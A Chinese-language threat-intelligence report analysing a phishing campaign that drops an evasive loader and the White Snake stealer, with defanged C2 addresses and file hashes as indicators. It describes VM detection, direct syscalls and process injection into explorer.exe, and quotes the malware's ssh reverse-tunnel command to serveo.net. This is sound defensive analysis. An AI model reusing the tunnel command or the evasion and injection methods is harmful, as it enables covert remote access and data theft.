主要发现
正在考虑的活动集群的方法不断发展:新的工具被添加到其武器库中。
使用受密码保护的存档可以让攻击者绕过安全措施并成功传播恶意软件。
代表各个部门发送网络钓鱼电子邮件会显着增加受害者与恶意附件交互的可能性。
活动说明
作为此活动的一部分,攻击者代表联邦机构发送网络钓鱼电子邮件。这封信中附有一份合法文件,这应该会降低用户的警惕性,并促使他打开第二个附件——一个受密码保护的档案。
网络钓鱼电子邮件
信函所附的合法文件
该存档包含以下文件:
Пароль 120917.txt — 没有内容的文件,其名称表示存档的密码。
Права и обязанности и процедура ст. 164, 170, 183 УПК РФ.rtf 是另一个用来分散用户注意力的合法文件。
Матералы к запросу, обязательно к ознакомлению и предоставлению информации-.exe — 包含恶意负载的可执行文件。
该可执行文件是一个加载程序in2al5d p3in4er(Invalid Printer),并检查其是否处于虚拟环境中,如果成功通过,则将恶意加载注入到进程的地址空间中explorer.exe。
检查是使用库进行的dxgi.dll,这使得可以获得系统使用的显卡制造商的标识符。如果它们与 Nvidia、AMD 或 Intel 不匹配,恶意文件将停止执行。
所讨论的加载程序的特点是它不使用WinAPI-calls 来访问 Windows 内核。相反,通过跳转到syscall具有所需参数的指令来直接调用内核函数。
内核调用的参数通过以下寄存器路由:R10、RDX、R8、R9。被调用的系统调用的编号被放置在寄存器中RAX。在这种情况下,该号码0×0036对应于系统调用NtQuerySystemInformation。
还值得注意的是,引导加载程序在运行时会尝试打开许多系统上不存在的随机文件并向其中写入随机数据。这些操作不会影响执行进度,但此类行为可以帮助检测系统上的恶意活动。
为了确定进程,explorer.exe引导加载程序会迭代正在运行的进程的结构,并将代表进程的校验和与存储的值进行比较。在检测到所需进程后,它会在其中分配一个具有执行权限的内存区域,并将解密的恶意负载复制到其中,然后更改进程上下文以执行注入的shellcode。
有效负载是使用开源Donut实用程序获得的shellcode,它允许您.NET在内存中执行可执行文件(包括),并且还具有附加功能,例如恶意有效负载的压缩和加密。
在本例中,该加载程序执行的恶意加载是 White Snake 窃取程序版本 1.6.1.9。值得注意的是,这是该窃取器的最新版本,于 2024 年 3 月下旬发布。此外,它也无法核实受害者是否在俄罗斯或独联体国家。
关于盗贼更新的消息
2023年8月,White Snake官方频道发布了一篇与我们研究相关的帖子,其中称一位买家修改了恶意软件,并删除了禁止在该地区执行的模块。
在White Snake频道发帖
我们假设,通过这样的声明,开发人员只是想避免阻塞流行的影子资源。
当White Snake启动时,会执行以下操作:
创建并检查配置中指定的互斥锁。
如果适当的选项可用,则通过获取型号、设备制造商并与程序中可用的字符串进行比较来检查是否处于虚拟环境中。通过执行以下 WMI 查询来获取设备型号和制造商:
如果有适当的选项,则根据配置将当前可执行文件移动到目录(在本例中为C:Users[user]AppDataLocalRobloxSecurity),并执行将任务添加到调度程序的命令,之后停止执行并从新位置运行:
有趣的是,在这种情况下,将复制合法的explorer.exe,而不嵌入 shellcode。
White Snake也可以使用该服务serveo[.]net。使用此选项时,将从 GitHub 存储库 ( ) 的链接下载 OpenSSH https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip,并使用以下命令启动:
ssh -o "StrictHostKeyChecking=no" -R [порт для подключения]:[локальный адрес]:[локальный порт] serveo.net
此外,在最新版本中,传输窃取者收集的数据的资源已更改:
http://185.119.118[.]59:8080
http://212.6.44[.]53:8080
http://149.88.44[.]159:80
http://206.189.109[.]146:80
https://164.90.185[.]9:443
http://193.142.58[.]127:80
http://185.217.98[.]121:80
http://185.217.98[.]121:8080
http://116.202.101[.]219:8080
https://185.217.98[.]121:443
https://64.227.21[.]98:443
http://144.126.132[.]141:8080
http://107.161.20[.]142:8080
https://192.99.196[.]191:443
http://216.250.190[.]139:80
https://44.228.161[.]50:443
http://66.42.56[.]128:80
http://154.26.128[.]6:80
http://18.228.80[.]130:80
http://23.248.176[.]37:180
http://45.61.136[.]13:80
http://104.248.208[.]221:80
http://23.224.102[.]6:8001
http://45.61.136[.]52:80
http://129.151.109[.]160:8080
https://13.231.21[.]109:443
https://18.178.28[.]151:443
妥协指标
93948C7FB89059E1F63AF04FEEF0A0834B65B18FFAF6610B419ADBC0E271E23D
CBABD91FB0C1C83867F71E8DF19C131AC6FB3B3F3F74765BC24924CB9D51AD41
10330FCC378DB73346501B2A26D2C749F51CACD962B54C62AA017DD9C1ED77C3
参考链接: https://bi.zone/expertise/blog/novyy-zagruzchik-scaly-wolf-okazalsya-neprigodnym-dlya-atak/
图片来源网络侵权可联系删除